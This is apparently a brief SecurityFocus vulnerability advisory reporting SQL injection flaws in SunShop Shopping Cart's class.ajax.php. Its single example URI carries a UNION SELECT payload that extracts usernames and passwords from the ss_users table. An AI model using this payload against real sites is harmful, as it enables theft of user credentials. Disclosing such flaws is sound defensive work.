SunShop Shopping Cart 'class.ajax.php' Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URI is available:

http://www.example.com/[path]//index.php?l=edit_registry&p=1&id=-99' UNION SELECT 1,2,3,concat(username,char(58),password),5,6 FROM ss_users/*


 

Privacy Statement
Copyright 2010, SecurityFocus